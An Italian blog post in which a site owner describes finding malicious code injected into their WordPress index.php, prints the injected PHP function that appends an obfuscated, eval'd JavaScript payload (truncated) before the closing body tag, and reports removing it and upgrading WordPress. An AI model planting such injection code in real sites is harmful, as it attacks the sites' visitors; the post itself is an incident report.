Oggi pomeriggio, dopo la segnalazione dell’amico FreedomTech, mi sono accorto che all’interno della mia index era stato inserito del codice maligno.

In particolare il codice, criptato in esadecimale si presentava in questo modo :

function phpfake($buffer)
{
  $Exp=’<script language="javascript">$="%63b%3d%22e(d%2573);%25…………….%7d;";
   eval(unescape($));document.write($);</script>’;
  return (ereg_replace("</body>", "$Exp</body>", $buffer));
}

Per risolvere il problema è bastato cancellare dalla index.php il codice maligno. Trattandosi di un bug della  versione di Wordpress non potevo non aggiornarlo e cosi ho aggiornato alla 2.5.1 .

L’aggiornamento è stato molto facile grazie allo ScreenCast di Andrea Beggi in cui vengono illustrati tutti gli step per aggiornare senza perdite di dati.

Essendo l’upgrade fresco fresco vi sarei grato se mi segnalaste gli errori che trovate